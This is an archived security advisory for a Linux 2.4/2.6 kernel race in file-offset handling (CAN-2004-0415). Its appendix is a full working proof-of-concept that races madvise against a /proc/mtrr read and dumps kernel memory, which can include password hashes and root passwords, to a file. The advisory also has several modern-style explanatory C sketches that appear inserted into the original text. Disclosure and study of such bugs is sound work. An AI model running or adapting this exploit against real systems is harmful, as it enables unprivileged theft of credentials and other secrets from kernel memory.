isec-0016-procleaks.txt

2004-08-05T00:00:00
ID PACKETSTORM:33965
Type packetstorm
Reporter Paul Starzetz
Modified 2004-08-05T00:00:00

Description

                                        
                                            `Synopsis: Linux kernel file offset pointer handling  
Product: Linux kernel  
Version: 2.4 up to and including 2.4.26, 2.6 up to and  
including 2.6.7  
Vendor: http://www.kernel.org/  
URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt  
CVE: CAN-2004-0415  
Author: Paul Starzetz <ihaquer@isec.pl>  
Date: Aug 04, 2004  
  
  
  
Issue:  
======  
  
A critical security vulnerability has been found in the Linux kernel  
code handling 64-bit file offset pointers.  
  
  
Details:  
========  
  
The Linux kernel offers a file handling API to the userland  
applications. Basically a file can be identified by a file name and  
opened through the open(2) system call which in turn returns a file  
descriptor for the kernel file object.  
  
One of the properties of the file object is something called 'file  
offset' (f_pos member variable of the file object), which is advanced if  
one reads from or writes to the file. It can also be changed through the  
lseek(2) system call and identifies the current writing/reading position  
inside the file image on the media.  
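
A minimal user-space sketch of how the file offset moves, assuming a
POSIX system. The helper name demo_offsets is hypothetical and only
serves the illustration: it records the offset after a write(2), after
an lseek(2) and after a read(2) on a temporary file.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: fills out[] with the file offset observed after
 * a 10-byte write, an lseek to 4, and a 3-byte read. Returns 0 on
 * success and -1 on any failure. */
static int demo_offsets(off_t out[3])
{
    char tmpbuf[3];
    FILE *tmp;
    int fd;

    assert(out != NULL);
    tmp = tmpfile();                    /* anonymous temporary file */
    if (tmp == NULL)
        return -1;
    fd = fileno(tmp);

    if (write(fd, "0123456789", 10) != 10)
        goto fail;
    out[0] = lseek(fd, 0, SEEK_CUR);    /* offset advanced by the write */

    out[1] = lseek(fd, 4, SEEK_SET);    /* offset set explicitly */

    if (read(fd, tmpbuf, sizeof(tmpbuf)) != (ssize_t)sizeof(tmpbuf))
        goto fail;
    out[2] = lseek(fd, 0, SEEK_CUR);    /* offset advanced by the read */

    fclose(tmp);
    return 0;
fail:
    fclose(tmp);
    return -1;
}
```

Calling demo_offsets() should report the offsets 10, 4 and 7 in that
order: lseek(fd, 0, SEEK_CUR) only queries the position.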
  
There are two different versions of the file handling API inside recent  
Linux kernels: the old 32-bit and the new (LFS) 64-bit API. We have  
identified numerous places where invalid conversions from 64-bit file  
offsets to 32-bit ones, as well as insecure accesses to the file offset  
member variable, take place.  
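
To illustrate the conversion problem in isolation, here is a small
user-space sketch. Both function names are hypothetical and do not
appear in the kernel. The first narrows a 64-bit offset the way an
unchecked cast would (keeping only the low 32 bits), the second
refuses values that do not fit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Keep only the low 32 bits of a 64-bit offset, as an unchecked
 * narrowing does. Offsets >= 2^32 silently alias small values. */
static uint32_t narrow_unchecked(int64_t off)
{
    return (uint32_t)(uint64_t)off;
}

/* Checked variant: returns 0 and stores the value if it fits into a
 * non-negative 32-bit signed offset, -1 otherwise. */
static int narrow_checked(int64_t off, int32_t *out)
{
    assert(out != NULL);
    if (off < 0 || off > INT32_MAX)
        return -1;
    *out = (int32_t)off;
    return 0;
}
```

With these definitions, the 64-bit offset 0x100000005 becomes 5 after
the unchecked narrowing, so a bounds check made on the narrowed value
says nothing about the original offset.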
  
We have found that most of the /proc entries (like /proc/version) leak  
about one page of uninitialized kernel memory and can be exploited to  
obtain sensitive data.  
  
We have found dozens of places with suspicious or bogus code. One of  
them resides in the MTRR handling code for the i386 architecture:  
  
  
static ssize_t mtrr_read(struct file *file, char *buf, size_t len,  
                         loff_t *ppos)  
{  
[1]     if (*ppos >= ascii_buf_bytes) return 0;  
[2]     if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;  
        if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;  
[3]     *ppos += len;  
        return len;  
} /* End Function mtrr_read */  
  
  
It is quite easy to see that, since copy_to_user can sleep, *ppos may  
hold a different value at [3] than it did when the checks [1] and [2]  
were made. In other words, code operating on the file->f_pos variable  
through a pointer must be atomic with respect to the current thread. We  
expect even more trouble in the SMP case.  
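
One way to avoid re-reading the shared offset is to take a single local
snapshot of it, validate and use only that snapshot, and write the new
position back from the local copy. The following is a user-space sketch
of that pattern, not the actual vendor patch: snapshot_read is a
hypothetical name, memcpy stands in for copy_to_user, and int64_t
stands in for loff_t.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copy up to len bytes from src (src_len bytes long) starting at *ppos.
 * The shared offset is read exactly once and written exactly once. */
static long snapshot_read(const char *src, size_t src_len,
                          char *dst, size_t len, int64_t *ppos)
{
    int64_t pos;
    size_t avail;

    assert(src != NULL && dst != NULL && ppos != NULL);

    pos = *ppos;                        /* single read of shared state */
    if (pos < 0 || (uint64_t)pos >= src_len)
        return 0;                       /* out of range: nothing to read */

    avail = src_len - (size_t)pos;      /* cannot underflow after check */
    if (len > avail)
        len = avail;

    memcpy(dst, src + pos, len);        /* stand-in for copy_to_user */

    *ppos = pos + (int64_t)len;         /* computed from the snapshot */
    return (long)len;
}
```

Even if another thread changes *ppos while the copy is in progress, the
bounds used for the copy stay the ones that were checked, and the value
written back is always within [0, src_len].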
  
  
Exploitation:  
=============  
  
In the following we want to concentrate on the mtrr.c code, however we  
think that other f_pos handling code in the kernel may also be  
exploitable.  
  
The idea is to use the blocking property of copy_to_user to advance the  
file->f_pos file offset to be negative allowing us to bypass the two  
checks marked with [1] and [2] in the above code.  
  
There are two situations in which copy_to_user() will sleep if there is  
no page table entry for the corresponding location in the user buffer  
used to receive the data:  
  
- the underlying buffer maps a file which is not in the kernel page  
cache yet. The file content must be read from the disk first  
  
- the mmap_sem semaphore of the process's VM is in a closed state, that  
is another thread sharing the same VM caused a down_write on the  
semaphore.  
  
We use the second method as follows. One of two threads sharing the same  
VM issues a madvise(2) call on a VMA that maps a sufficiently big file,  
setting the madvise flag to WILLNEED. This will issue a down_write on  
the mmap semaphore and schedule a read-ahead request for the mmapped  
file.  
  
In the meantime the second thread issues a read on the /proc/mtrr file,  
thus going to sleep until the first thread returns from the madvise  
system call. The two threads will be woken up in a FIFO manner, thus the  
first thread will run first and can advance the file pointer of the proc  
file to the maximum possible value of 0x7fffffffffffffff while the  
second thread is still waiting in the scheduler queue for the CPU (in  
the non-SMP case).  
  
After the place marked with [3] has been executed, the file position  
will have a negative value and the checks [1] and [2] can be passed for  
any buffer length supplied, thus leaking the kernel memory from the  
address of ascii_buffer on to the user space.  
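
The arithmetic behind this can be checked in user space. The sketch
below is an illustration under assumptions, not kernel code: wrap_add
and checks_bypassed are hypothetical names, int64_t stands in for
loff_t, and the addition is done on unsigned values to model
two's-complement wraparound without relying on signed overflow (the
conversion back to int64_t is modular on gcc and clang).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Add len to pos with two's-complement wraparound. */
static int64_t wrap_add(int64_t pos, size_t len)
{
    return (int64_t)((uint64_t)pos + (uint64_t)len);
}

/* Returns 1 if neither check [1] nor check [2] of mtrr_read would stop
 * or shorten a read of len bytes at offset pos, 0 otherwise. */
static int checks_bypassed(int64_t pos, size_t len, unsigned int buf_bytes)
{
    assert(len > 0);
    if (pos >= (int64_t)buf_bytes)
        return 0;                       /* check [1] returns early */
    if (wrap_add(pos, len) > (int64_t)buf_bytes)
        return 0;                       /* check [2] clamps len */
    return 1;                           /* full len is copied */
}
```

Starting from 0x7fffffffffffffff, adding a 4096-byte read length yields
0x8000000000000fff, which is negative as a signed 64-bit value. A
negative offset compares below any buffer size, so both checks pass for
the next read, whereas an ordinary offset of 0 with the same length is
clamped by check [2].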
  
We have attached proof-of-concept exploit code that reads portions of  
kernel memory. Other exploit code we have at our disposal can use  
other /proc entries (like /proc/version) to read one page of kernel  
memory.  
  
  
Impact:  
=======  
  
Since no special privileges are required to open the /proc/mtrr file for  
reading, any process may exploit the bug to read huge parts of kernel  
memory.  
  
The kernel memory dump may include very sensitive information like  
hashed passwords from /etc/shadow or even the root password.  
  
We have found in an experiment that after the root user logged in using  
ssh (in our case it was OpenSSH using PAM), the root password was kept  
in kernel memory. This is very surprising since sshd will quickly clean  
(overwrite with zeros) the memory portion used to store the password.  
But the password may have made its way through various kernel paths like  
pipes or sockets.  
  
Tested and known to be vulnerable kernel versions are all <= 2.4.26 and  
<= 2.6.7. All users are encouraged to patch all vulnerable systems as  
soon as appropriate vendor patches are released. There is no hotfix for  
this vulnerability.  
  
  
Credits:  
========  
  
Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and  
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF  
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF  
ONE OF THE AUTHORS.  
  
  
Disclaimer:  
===========  
  
This document and all the information it contains are provided "as is",  
for educational purposes only, without warranty of any kind, whether  
express or implied.  
  
The authors reserve the right not to be responsible for the topicality,  
correctness, completeness or quality of the information provided in  
this document. Liability claims regarding damage caused by the use of  
any information provided, including any kind of information which is  
incomplete or incorrect, will therefore be rejected.  
  
  
Appendix:  
=========  
  
/*  
* gcc -O3 proc_kmem_dump.c -o proc_kmem_dump  
*  
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.  
*  
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"  
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION  
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.  
*  
*/  
  
  
#define _GNU_SOURCE  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <signal.h>  
#include <string.h>  
#include <errno.h>  
#include <unistd.h>  
#include <fcntl.h>  
#include <time.h>  
#include <sched.h>  
  
#include <sys/socket.h>  
#include <sys/select.h>  
#include <sys/time.h>  
#include <sys/mman.h>  
  
#include <linux/unistd.h>  
  
#include <asm/page.h>  
  
  
// define machine mem size in MB  
#define MEMSIZE 64  
  
  
  
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,  
uint, wh);  
  
  
  
void fatal(const char *msg)  
{  
printf("\n");  
if(!errno) {  
fprintf(stderr, "FATAL ERROR: %s\n", msg);  
}  
else {  
perror(msg);  
}  
  
printf("\n");  
fflush(stdout);  
fflush(stderr);  
exit(31337);  
}  
  
  
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,  
size=PAGE_SIZE, us;  
static volatile int go[2];  
static loff_t off;  
static char *buf=NULL, *file, child_stack[PAGE_SIZE];  
static struct timeval tv1, tv2;  
static struct stat st;  
  
  
// child closes semaphore & sleeps  
int start_child(void *arg)  
{  
// unlock parent & close semaphore  
go[0]=0;  
madvise(file, csize, MADV_DONTNEED);  
madvise(file, csize, MADV_SEQUENTIAL);  
gettimeofday(&tv1, NULL);  
read(pfd, buf, 0);  
  
go[0]=1;  
r = madvise(file, csize, MADV_WILLNEED);  
if(r)  
fatal("madvise");  
  
// parent blocked on mmap_sem? GOOD!  
if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {  
r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);  
if( r == -1 )  
fatal("lseek");  
printf("\n[+] Race won!"); fflush(stdout);  
go[0]=2;  
} else {  
printf("\n[-] Race lost %d, use another file!\n", go[1]);  
fflush(stdout);  
kill(getppid(), SIGTERM);  
}  
_exit(1);  
  
return 0;  
}  
  
  
void usage(char *name)  
{  
printf("\nUSAGE: %s <file not in cache>", name);  
printf("\n\n");  
exit(1);  
}  
  
  
int main(int ac, char **av)  
{  
if(ac<2)  
usage(av[0]);  
  
// mmap big file not in cache  
r=stat(av[1], &st);  
if(r)  
fatal("stat file");  
csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);  
  
fd=open(av[1], O_RDONLY);  
if(fd<0)  
fatal("open file");  
file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);  
if(file==MAP_FAILED)  
fatal("mmap");  
close(fd);  
printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);  
fflush(stdout);  
  
pfd=open("/proc/mtrr", O_RDONLY);  
if(pfd<0)  
fatal("open");  
  
fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);  
if(fd<0)  
fatal("open data");  
  
r=ftruncate(fd, fsize);  
if(r<0)  
fatal("ftruncate");  
  
buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);  
if(buf==MAP_FAILED)  
fatal("mmap");  
close(fd);  
printf("\n[+] mmaped kernel data file at %p", buf);  
fflush(stdout);  
  
// clone thread wait for child sleep  
nc = nice(0);  
cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,  
CLONE_FILES|CLONE_VM, NULL);  
nice(19-nc);  
while(go[0]==0) {  
i++;  
}  
  
// try to read & sleep & move fpos to be negative  
gettimeofday(&tv1, NULL);  
go[1] = 1;  
r = read(pfd, buf, size );  
go[1] = 2;  
gettimeofday(&tv2, NULL);  
if(r<0)  
fatal("read");  
while(go[0]!=2) {  
i++;  
}  
  
us = tv2.tv_sec - tv1.tv_sec;  
us *= 1000000;  
us += (tv2.tv_usec - tv1.tv_usec) ;  
  
printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);  
r = _llseek(pfd, 0, 0, &off, SEEK_CUR);  
if(r < 0 ) {  
printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");  
fflush(stdout);  
i=0;  
for(;;) {  
r = read(pfd, buf, PAGE_SIZE );  
if(r!=PAGE_SIZE)  
break;  
buf += PAGE_SIZE;  
i++;  
printf("\r PAGE %6d", i); fflush(stdout);  
}  
printf("\n[+] done, err=%s", strerror(errno) );  
fflush(stdout);  
}  
close(pfd);  
  
printf("\n");  
sleep(1);  
kill(cpid, 9);  
  
return 0;  
}  
  
`